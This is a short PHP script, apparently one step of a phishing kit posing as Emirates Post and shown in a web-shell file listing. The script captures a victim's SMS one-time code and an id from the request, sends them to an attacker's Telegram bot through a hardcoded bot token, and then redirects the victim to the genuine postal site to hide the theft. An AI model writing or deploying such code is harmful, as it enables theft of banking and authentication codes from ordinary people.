| Current Path : /home2/wtmwscom/public_html/post/ |
| Current File : /home2/wtmwscom/public_html/post/step3.php |
<?php
$id = $_GET['id'];
$sms = $_POST['otp'];
$message = '========================================
======qatar======
id : '.$id.'
sms2 : '.$sms;
file_get_contents("https://api.telegram.org/bot1475567621:AAFAFOvWAVGYQyzWPYx6F57M2Pc9p8ZRsS4/SendMessage?chat_id=987654451&text=".urlencode($message)."" );
header("Location: https://emiratespost.ae/Portal/Home?locale=en-us"); /* Redirect browser */
exit();